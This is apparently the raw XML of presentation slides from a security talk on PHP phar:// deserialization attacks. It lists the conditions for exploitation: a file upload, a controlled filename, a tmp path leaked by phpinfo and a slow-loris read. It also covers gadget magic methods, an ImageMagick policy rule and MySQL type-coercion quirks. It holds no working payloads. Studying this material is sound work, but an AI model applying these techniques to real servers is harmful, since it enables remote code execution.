                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;policy domain="coder" rights="</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>none</a:t>
            </a:r>
            <a:r>
              <a:t>" pattern="</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PLT</a:t>
            </a:r>
            <a:r>
              <a:t>" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="5200"/>
              </a:lnSpc>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/policymap&gt;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Y So Serial PHP?…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25400" y="-74814"/>
            <a:ext cx="13055601" cy="93825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Y So Serial PHP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3500">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://github.com/ambionics/phpggc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3800">
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C2CACA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stream Wrappers in PHP:</a:t>
            </a:r>
            <a:r>
              <a:t> file://, http://, ftp://, php://, zlib://, data://, glob://, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>phar://</a:t>
            </a:r>
            <a:r>
              <a:t>, ssh2://, rar://, ogg://, expect://</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="421105" indent="-421105">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="421105" indent="-421105" algn="l">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CF79E0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHAR</a:t>
            </a:r>
            <a:r>
              <a:t> archives are </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>like Java jar</a:t>
            </a:r>
            <a:r>
              <a:t> files for PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="421105" indent="-421105" algn="l">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Contain metadata with </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>seralize()</a:t>
            </a:r>
            <a:r>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="421105" indent="-421105" algn="l">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Stream Wrappers run on all PHP file operations: file_get_contents, fopen, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>file_exists</a:t>
            </a:r>
            <a:r>
              <a:t>, others…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="421105" indent="-421105" algn="l">
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Supports multiple formats, including TAR, TAR format is very flexible and allows creation of </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jpeg/tar polyglot</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Conditions For Exploitation…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-25400" y="814186"/>
            <a:ext cx="13055601" cy="76045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200">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Conditions For Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>1: Ability to upload a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>2: Ability to control input filename to file call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="F7FEFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr b="1" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="85D4FF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>All PHP Servers allow file uploading, the file will be written to tmp, filename can be seen in call to phpinfo(), file will exist until script execution completes.  Slow Loris style read can allow tmp file to exist for many minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="C2C9C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Exploitation depends on normal deserialize bugs, requires an existing loaded object class with </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__destruct</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__wakeup</a:t>
            </a:r>
            <a:r>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__toString</a:t>
            </a:r>
            <a:r>
              <a:t>, etc code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Lets talk about MySQL"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C8E059"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Lets talk about MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Fast highly scalable SQL database with estimated 45% market share.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="2558586"/>
            <a:ext cx="5422900" cy="5925014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="324484" indent="-324484" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2600">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27813" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Fast highly scalable SQL database with estimated 45% market share.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324484" indent="-324484" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2600">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27813" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Designed for the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324484" indent="-324484" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2600">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27813" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>ACID compliant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324484" indent="-324484" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27813" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Does not strictly enforce constraints</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324484" indent="-324484" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr sz="2600">
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27813" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Will attempt to fix queries automagically for you - emit warnings that everyone ignores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="324484" indent="-324484" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="2600"/>
              </a:spcBef>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="E0BA5C"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="27813" dir="5400000">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Non obvious Type Coercion …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="143" name="MySQL-Logo.png"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6707716" y="2751606"/>
            <a:ext cx="5778502" cy="3197923"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5778501" cy="3197922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="141" name="MySQL-Logo.png" descr="MySQL-Logo.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="190500" y="190500"/>
              <a:ext cx="5397502" cy="2791522"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="142" name="MySQL-Logo.png" descr="MySQL-Logo.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5778502" cy="319792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wat.jpg"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="160092" y="77095"/>
            <a:ext cx="12684617" cy="8608812"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="12684615" cy="8608810"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="wat.jpg" descr="wat.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="190499" y="190500"/>
              <a:ext cx="12303617" cy="8202412"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="146" name="wat.jpg" descr="wat.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="12684617" cy="860881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dustrial">
  <a:themeElements>
    <a:clrScheme name="Industrial">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="BC00FF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="A7A7A7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="535353"/>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a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Helvetica"/>
        <a:ea typeface="Helvetica"/>
        <a:cs typeface="Helvetica"/>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A7A7A7"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="535353"/>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a:ea typeface="Helvetica Neue"/>
        <a:cs typeface="Helvetica Neue"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Helvetica"/>
        <a:ea typeface="Helvetica"/>
        <a:cs typeface="Helvetica"/>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BC00FF"/>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="38100" dir="5400000">
                <a:srgbClr val="000000"/>
              </a:outerShdw>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